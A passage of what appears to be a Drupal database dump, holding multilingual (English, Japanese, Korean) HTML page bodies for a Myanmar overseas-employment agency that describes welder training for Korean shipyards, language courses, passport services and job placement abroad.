Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">관련</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">공장</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">노인</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">돌봄</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사업</span><o:p></o:p></p><p><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">&nbsp; &nbsp;6. &nbsp;두바이</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">말레이시아</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">싱가포</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">,</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">태국과</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">같은</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">국가에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일하기를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">원하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사람들을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">위해</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기본</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">영어</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">과정과</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">필요하는 &nbsp; &nbsp; &nbsp; &nbsp; 경우에&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">컴퓨터</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">교육과</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">같은</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">많은</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">과정들과 연결하고 취업</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기회를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스를 하고 있습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">&nbsp; 7. 상기</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스들을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-spacerun:yes;\">&nbsp; </span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">IRIS(International Recruitment Integrity System)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제정한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">윤리적</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">채용</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">및</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">공정한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">노동</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">관행 &nbsp; &nbsp; &nbsp; 의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기준에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">따라</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">마련하고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공합니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span><o:p></o:p></p>', '', 'full_html'),
('page', 0, 24, 201, 'en', 0, '<p>1. Providing necessary training to all citizens of Myanmar regardless of race and religion from various regions and states who want to work at the shipyards in Korea with an E 7-3 visa as a welder technician level at the Sinmalike Shipyard under the Ministry of Transport and Communications and connecting them with job opportunities.</p><p>&nbsp;2. Co-opening and teaching Korean, Japanese, and English basic language courses for work so that there are no difficulties in the workplace when traveling to foreign countries to work.&nbsp;</p><p>3. Providing Passport application service for those who do not have a Passport (PJ) required to travel to foreign countries.</p><p>&nbsp;4. For those who want to work in Japan with a Training Visa, Tokutei Ginou visa, we are opening and teaching the necessary courses to get familiar with Japan\'s traditional culture and customs, and connect with employment opportunities.&nbsp;</p><p>5. Those who pass the Japanese language test N3, N2 (JLPT, JFT, NAT-Test, Top J) and above, who have a Work Visa, we are connecting with related courses and services below:&nbsp;</p><p>• Translation services&nbsp;</p><p>• IT businesses&nbsp;</p><p>• Engineering related works (Civil, Mechanical, EP, EC, Auto CAD, etc)&nbsp;</p><p>• Nursing support activities&nbsp;</p><p>Those who want to work with a Training Visa, we are also providing services to following businesses:&nbsp;</p><p>• Car repair and related works</p><p>&nbsp;• Industrial works&nbsp;</p><p>• House building works&nbsp;</p><p>• Food industries&nbsp;</p><p>• Rice box factories&nbsp;</p><p>• Shop operations</p><p>• Hotel businesses</p><p>• Garment industries</p><p>&nbsp;• Construction works</p><p>&nbsp;• Agricultural works&nbsp;</p><p>• Water products; Fishery-related factories&nbsp;</p><p>• Elderly care services businesses&nbsp;</p><p>6. For those who want to work in countries such as Dubai, Malaysia, Singapore, Thailand, we provide services to facilitate employment opportunities , if necessary , we connect with many courses such as computer training and basic English courses.&nbsp;</p><p>7. The above services are arranged and provided in accordance with the standards of Ethical Recruitment and Fair Labor Practices established by the International Recruitment Integrity System (IRIS)</p>', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('page', 0, 24, 201, 'ja', 0, '<p class=\"MsoNormal\">1.&nbsp;<span style=\"mso-spacerun:yes;\"> </span><span lang=\"JA\">ニューコメットトレンディグエイジェンシーでは韓国の造船所で</span>E 7-3 Visa<span lang=\"JA\">で働きたいミャンマー全国から民族 &nbsp; &nbsp; &nbsp;問わず、商務部の下でシンマライ湾岸で経験豊富な先生達の元で練習を重ねた研修をしていただき、仕事紹介 &nbsp; &nbsp; &nbsp;をしております。</span><o:p></o:p></p><p class=\"MsoNormal\">2. <span lang=\"JA\">海外に勤める際使えるそれぞれの国の言葉が勉強できる学校も開いております。</span>(<span lang=\"JA\">現在日本語学校、韓国語学校</span>)<o:p></o:p></p><p class=\"MsoNormal\">3 .<span lang=\"JA\">パスポート作成サービス</span><o:p></o:p></p><p class=\"MsoNormal\">4. <span lang=\"JA\">日本に実習生、特定技能などで勤める学生達には言語だけでなく日本の習慣、文化なども授業の一部として、 &nbsp; &nbsp; &nbsp; &nbsp;取り込んでおります。</span><o:p></o:p></p><p>5.<span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\">日本語能力試験</span>(JLPT,<span style=\"mso-spacerun:yes;\">&nbsp; </span>JFT,<span style=\"mso-spacerun:yes;\">&nbsp;</span>NAT-TEST, TOP-J)<span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\">の</span>N3,N2<span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\">以上の合格者達にはワークビザである</span><o:p></o:p></p><p>• <span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">通訳、翻訳</span><o:p></o:p></p><p>• IT<span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">事業</span><o:p></o:p></p><p>• <span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">エンジニアに関する事業</span><span style=\"mso-spacerun:yes;\">&nbsp;</span>(Civil,Mechanical,EP,EC,Auto Card<span style=\"font-family:&quot;MS Gothic&quot;;mso-bidi-font-family:&quot;MS Gothic&quot;;\">など</span>)<o:p></o:p></p><p>• <span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">介護関係</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;mso-fareast-language:JA;\" lang=\"JA\">実習生ビザなどに興味を持たれた学生達には下記　の仕事の紹介を行っております。</span><o:p></o:p></p><p>• <span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">車修理関係</span><o:p></o:p></p><p>• <span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">工業関係</span><o:p></o:p></p><p>• &nbsp;<span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">建築業関係</span><o:p></o:p></p><p>• &nbsp;<span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">食品関係</span><o:p></o:p></p><p>• &nbsp;<span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">レストラン</span><o:p></o:p></p><p>• <span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">ホテル関係</span><o:p></o:p></p><p>• <span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">衣類関係</span><o:p></o:p></p><p>• <span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">農業関係</span><o:p></o:p></p><p>&nbsp;•<span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">漁業関係の工場</span><o:p></o:p></p><p>&nbsp;•<span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">介護関係&nbsp;</span><span style=\"font-family:&quot;MS Mincho&quot;;font-size:9.5pt;mso-bidi-font-family:&quot;MS Mincho&quot;;mso-bidi-font-size:10.0pt;\">{Training Visa)</span><o:p></o:p><o:p></o:p></p><p class=\"MsoNormal\">6.<span lang=\"JA\">ドバイ、マレーシア、シンガポール、タインなどで働きたい学生達のためにも英語など必要な場合に応じて、パ &nbsp; &nbsp;ソコントレーニングでできない事がないように時間をかけて、良いネットワークで仕事のチャンスを掴むサビ &nbsp; &nbsp; &nbsp; ースをしております。</span><o:p></o:p></p><p><span style=\"font-family:&quot;Yu Mincho&quot;,serif;font-size:10.5pt;mso-ansi-language:EN-US;mso-ascii-theme-font:minor-latin;mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-bidi-font-size:11.0pt;mso-bidi-language:AR-SA;mso-bidi-theme-font:minor-bidi;mso-fareast-language:JA;mso-fareast-theme-font:minor-fareast;mso-hansi-theme-font:minor-latin;\">7. &nbsp;</span><span style=\"font-family:&quot;Yu Mincho&quot;,serif;font-size:10.5pt;mso-ansi-language:EN-US;mso-ascii-theme-font:minor-latin;mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-bidi-font-size:11.0pt;mso-bidi-language:AR-SA;mso-bidi-theme-font:minor-bidi;mso-fareast-language:JA;mso-fareast-theme-font:minor-fareast;mso-hansi-theme-font:minor-latin;\" lang=\"JA\">上記のサービスを</span><span style=\"font-family:&quot;Yu Mincho&quot;,serif;font-size:10.5pt;mso-ansi-language:EN-US;mso-ascii-theme-font:minor-latin;mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-bidi-font-size:11.0pt;mso-bidi-language:AR-SA;mso-bidi-theme-font:minor-bidi;mso-fareast-language:JA;mso-fareast-theme-font:minor-fareast;mso-hansi-theme-font:minor-latin;\">International Recruitment Integrity System(IRIS)</span><span style=\"font-family:&quot;Yu Mincho&quot;,serif;font-size:10.5pt;mso-ansi-language:EN-US;mso-ascii-theme-font:minor-latin;mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-bidi-font-size:11.0pt;mso-bidi-language:AR-SA;mso-bidi-theme-font:minor-bidi;mso-fareast-language:JA;mso-fareast-theme-font:minor-fareast;mso-hansi-theme-font:minor-latin;\" lang=\"JA\">が定めた</span><span style=\"font-family:&quot;Yu Mincho&quot;,serif;font-size:10.5pt;mso-ansi-language:EN-US;mso-ascii-theme-font:minor-latin;mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-bidi-font-size:11.0pt;mso-bidi-language:AR-SA;mso-bidi-theme-font:minor-bidi;mso-fareast-language:JA;mso-fareast-theme-font:minor-fareast;mso-hansi-theme-font:minor-latin;\">Ethical Recruitment and Fair Labour Practices</span><span style=\"font-family:&quot;Yu Mincho&quot;,serif;font-size:10.5pt;mso-ansi-language:EN-US;mso-ascii-theme-font:minor-latin;mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-bidi-font-size:11.0pt;mso-bidi-language:AR-SA;mso-bidi-theme-font:minor-bidi;mso-fareast-language:JA;mso-fareast-theme-font:minor-fareast;mso-hansi-theme-font:minor-latin;\" lang=\"JA\">に &nbsp; &nbsp; &nbsp;合った基準で管理しております。</span></p>', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('page', 0, 24, 201, 'ko', 0, '<ol><li class=\"MsoListParagraphCxSpFirst\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><p><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">&nbsp; &nbsp; 한국 조선소에서</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"> E-7-3 </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">비자</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">(</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">용접공</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">로 일하고 싶은 미얀마 여러 지역에서 온 모든 노동자들을 인종과 종교의 차별 없이 교통통신부 산하 씬마락</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"> (Sinmalike) </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">조선소에서 필요한 교육을 시키고 취업 기회를 제공함해외</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">방문에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">필요한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">여권</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">(PJ)&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">없는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">분을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">위한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">여권</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">신청</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공</span></p><p><o:p></o:p></p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><p><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">&nbsp; &nbsp; 외국에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일할 때 직장에서</span><span 